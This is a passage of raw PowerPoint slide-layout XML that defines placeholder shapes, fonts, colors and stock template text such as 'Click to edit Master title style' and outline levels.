            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447840" y="641520"/>
            <a:ext cx="11290320" cy="3650760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="5259960"/>
            <a:ext cx="11029320" cy="997920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="29"/>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IN" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="30"/>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15" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="31"/>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0E19551E-BEC9-469F-92D3-0A787288727F}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-IN"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3"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14"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pic>
        <p:nvPicPr>
          <p:cNvPr id="15"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16" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="702000"/>
            <a:ext cx="11029320" cy="1013400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="1415160"/>
            <a:ext cx="11029320" cy="4572360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="t" vert="eaVert">
            <a:no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Click to edit Master text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>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1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="900000" indent="-270000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="261"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1cade4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1300" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="124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Fourth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4" marL="160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Fifth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="4"/>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IN" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="5"/>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0" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="6"/>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1077C37A-F2A4-4253-8545-53C5D075F112}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-IN"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 name="Rectangle 8" hidden="1"/>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22" name="Rectangle 9" hidden="1"/>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23" name="Rectangle 10" hidden="1"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="24"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25" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8058240" y="599760"/>
            <a:ext cx="3687120" cy="58165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26" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8204040" y="863640"/>
            <a:ext cx="3123720" cy="4807080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="ctr" vert="eaVert">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="775080" y="863640"/>
            <a:ext cx="7161120" cy="4807080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="t" vert="eaVert">
            <a:no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Click to edit Master text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>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1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="900000" indent="-270000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="261"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1cade4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1300" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="124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Fourth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4" marL="160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Fifth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446400" y="457200"/>
            <a:ext cx="3702960" cy="946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29" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8042040" y="453600"/>
            <a:ext cx="3702960" cy="982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30" name="Rectangle 9"/>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31" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="7"/>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IN" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="8"/>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33" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="9"/>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2114AC3E-2F93-48C4-A48B-EA5E259F60F0}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-IN"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4"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35"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36"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pic>
        <p:nvPicPr>
          <p:cNvPr id="37"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38"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Autofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="1302120"/>
            <a:ext cx="11029320" cy="4672800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="ctr">
            <a:no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Click to edit Master text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>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1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="900000" indent="-270000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="261"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1cade4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1300" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="124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Fourth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4" marL="160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Fifth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>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IN"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44"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45"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pic>
        <p:nvPicPr>
          <p:cNvPr id="46"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47" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447840" y="5141880"/>
            <a:ext cx="11290680" cy="125856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48" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="2394000"/>
            <a:ext cx="11029320" cy="2147040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="4541400"/>
            <a:ext cx="11029320" cy="600120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="11"/>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IN" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="12"/>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52" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="13"/>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80E5854F-32C3-4663-B9F5-F51154B2F269}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-IN"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3"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54"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55"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pic>
        <p:nvPicPr>
          <p:cNvPr id="56"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57" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="729720"/>
            <a:ext cx="11029320" cy="492480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
